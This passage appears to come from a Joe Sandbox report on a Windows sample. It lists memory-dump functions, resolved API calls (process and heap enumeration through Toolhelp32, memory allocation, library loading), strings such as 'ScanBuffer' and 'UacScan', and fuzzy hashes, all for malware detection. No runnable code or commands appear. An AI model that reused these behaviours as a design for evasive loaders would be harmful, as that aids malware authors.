                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                  • Instruction ID: 5fabf5d128ffc6cbcb545cc9ff6c032aba9bfc033b1e4f1f0c2c08fdb14a8b12
                                                                                                                  • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                  • Instruction Fuzzy Hash: 41D05BB23491507BE224965A5D48EB75BDCCBC67B4F10463EF558C7180D7208C05C671
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02E8356F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,Initialize), ref: 02E67E8B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                  • Instruction ID: a02bf342b018baa32ffd95eb1b0c2bb1828a560ff8d547137f48bde6ddccec4a
                                                                                                                  • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                  • Instruction Fuzzy Hash: 9BC08CF22E12010E1E60A6FC2CCC23942C989851BC760FE25F438CA2C1D31A9C6A2820
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02E8041F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,UacInitialize), ref: 02E67E67
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                  • Instruction ID: 0c618d0497beec5c8984c1d9c1c14b06ed0654521b6e1a274475f768d2c1da45
                                                                                                                  • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                  • Instruction Fuzzy Hash: 7EC08CB02D12000A5A6066FC2CCC27952CA89052BC364FA25F438C62E2D32698EA6810
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3341692771-0
                                                                                                                  • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                  • Instruction ID: 6350a11e5674882a0d57a031be0d11fe1f0214c8a3dc8a72edf5b971b89639b6
                                                                                                                  • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                  • Instruction Fuzzy Hash: EAC012A26C023057FB315699ACC87A262CD9B052D8B1450A1A408DB390E360980056A0
                                                                                                                  APIs
                                                                                                                  • timeSetEvent.WINMM(00002710,00000000,02E8C350,00000000,00000001), ref: 02E8C36C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Eventtime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2982266575-0
                                                                                                                  • Opcode ID: 6f83a436978c5269780bb4c2b997a729376bc633067643d6d4ddbb250eeb2648
                                                                                                                  • Instruction ID: dc3515bad4c3fd619533eaa8ead4ece0a127410cd49ae0e5be3e409145a1c74b
                                                                                                                  • Opcode Fuzzy Hash: 6f83a436978c5269780bb4c2b997a729376bc633067643d6d4ddbb250eeb2648
                                                                                                                  • Instruction Fuzzy Hash: D5C04CB17D13006AF91055A55C86F32559D9306751F206452B648E91C1D6A258514E64
                                                                                                                  APIs
                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02E64C3F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2525500382-0
                                                                                                                  • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                  • Instruction ID: a48d08e864ad3a41f0dfd98dfb7dc53f75a85d28f7d1dc8387a0f8a1c2ca311f
                                                                                                                  • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                  • Instruction Fuzzy Hash: D6B012342C820515FA3923620F0C7F3004E0B622CEF84F051AF1CCC2D1FB00C0019836
                                                                                                                  APIs
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02E64C57
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3341692771-0
                                                                                                                  • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                  • Instruction ID: a0eb9432de24011bddd46709e5f3b91afd45a10b10f38b8bbce729ee780fa04c
                                                                                                                  • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                  • Instruction Fuzzy Hash: CEA011A80C02020AAA2B2228002803A22232EC02C8388E0A822088A282CA2A8000A8A0
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02E61A03), ref: 02E615E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: ad77a380d83d45875d880724e91c6513b04d9cdc4579fc15c100246a3b70aaf2
                                                                                                                  • Instruction ID: 1fd1d67324dedcdcbdb77edb2f09fdf8f455fa6933c8d0a6687db8287531bebe
                                                                                                                  • Opcode Fuzzy Hash: ad77a380d83d45875d880724e91c6513b04d9cdc4579fc15c100246a3b70aaf2
                                                                                                                  • Instruction Fuzzy Hash: 48F019F0BC12008FDB068EBA99463156AE6E78A288F508579E609DF3D8E77184418B84
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02E616A4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: 9700230e9756a934251e315ba052490b6461308fa95c7cf9f8983fcb0b46e8c2
                                                                                                                  • Instruction ID: 7a7ff4fdc1196f30e2152f28f65c5ad28991d039b8fcbff70db4f208668230b2
                                                                                                                  • Opcode Fuzzy Hash: 9700230e9756a934251e315ba052490b6461308fa95c7cf9f8983fcb0b46e8c2
                                                                                                                  • Instruction Fuzzy Hash: 9EF0B4B2BC0795ABDB219F5ADC85796BB98FB10364F458139F90C9F340D770A850CB94
                                                                                                                  APIs
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02E61FE4), ref: 02E61704
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1263568516-0
                                                                                                                  • Opcode ID: 82d03e3392de2983448b19f087be712b41610e9f8405baf0806005541e6f849d
                                                                                                                  • Instruction ID: b211f9e2df926113e2413bd4a34ce24c30bdd0cb768707f6ea24e0001f8b34e8
                                                                                                                  • Opcode Fuzzy Hash: 82d03e3392de2983448b19f087be712b41610e9f8405baf0806005541e6f849d
                                                                                                                  • Instruction Fuzzy Hash: A9E026753C0300AFDB100E7A4C497227BCCEB556A4F189435F108CF341C2A0E8008B20
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02E7ADA3,?,?,02E7AE35,00000000,02E7AF11), ref: 02E7AB30
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02E7AB48
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02E7AB5A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02E7AB6C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02E7AB7E
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02E7AB90
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02E7ABA2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02E7ABB4
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02E7ABC6
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02E7ABD8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02E7ABEA
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02E7ABFC
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02E7AC0E
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02E7AC20
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02E7AC32
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02E7AC44
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02E7AC56
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                  • API String ID: 667068680-597814768
                                                                                                                  • Opcode ID: 772a42bb2220645ab3f0705fc5b6f70b9c6e849a515bf3e24a413116d2098cd2
                                                                                                                  • Instruction ID: 4c243bc3d963f8874fc19b5e4dbac29032b1e4048c4a4fe0558bcf82e0da216b
                                                                                                                  • Opcode Fuzzy Hash: 772a42bb2220645ab3f0705fc5b6f70b9c6e849a515bf3e24a413116d2098cd2
                                                                                                                  • Instruction Fuzzy Hash: 9131D0B09D0750EFEF00EBB5E889A3D77A9AB16741740AD75B811DF304E6B8A494CF12
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65925
                                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02E6593C
                                                                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02E6596C
                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E659D0
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65A06
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65A19
                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65A2B
                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000,02E8E790), ref: 02E65A37
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14,02E60000), ref: 02E65A6B
                                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E66C14), ref: 02E65A77
                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02E65A99
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                  • API String ID: 3245196872-1565342463
                                                                                                                  • Opcode ID: b4d96bdb3b1d0cc0ce72512c286c0b8951eea9d8b0c7e0019d784060380b4bbb
                                                                                                                  • Instruction ID: 6b477fa5903df99eb00a24ec5fc77aaab43239bf0a73f7da22a109477182d261
                                                                                                                  • Opcode Fuzzy Hash: b4d96bdb3b1d0cc0ce72512c286c0b8951eea9d8b0c7e0019d784060380b4bbb
                                                                                                                  • Instruction Fuzzy Hash: 36417271EC0619AFDB11DAE8CC8CAFEB7BDAF04394F4495A5A158E7241D7309A448F50
                                                                                                                  APIs
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E65BE8
                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E65BF5
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E65BFB
                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E65C26
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E65C6D
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E65C7D
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E65CA5
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E65CB5
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E65CDB
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E65CEB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                  • API String ID: 1599918012-2375825460
                                                                                                                  • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                  • Instruction ID: 45d9eb36cda063c1915bdce357545febaefd88e9a5d1a2855c5b68cb26bf6084
                                                                                                                  • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                  • Instruction Fuzzy Hash: D131A971FC025C2AEB26D6B48C4DFFE77AE5B043C4F44A1A1A648E6181D7749E448F50
                                                                                                                  APIs
                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02E67FF5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1705453755-0
                                                                                                                  • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                  • Instruction ID: b5e446b251dc1d27b87c95481320ca9f9036ae8b6130cb24583c233f140a5b79
                                                                                                                  • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                  • Instruction Fuzzy Hash: AF111EB5E40209AF9B00CF99CC81DBFF7F9FFC9700B54C569A408E7254E671AA018BA0
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E6A7E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
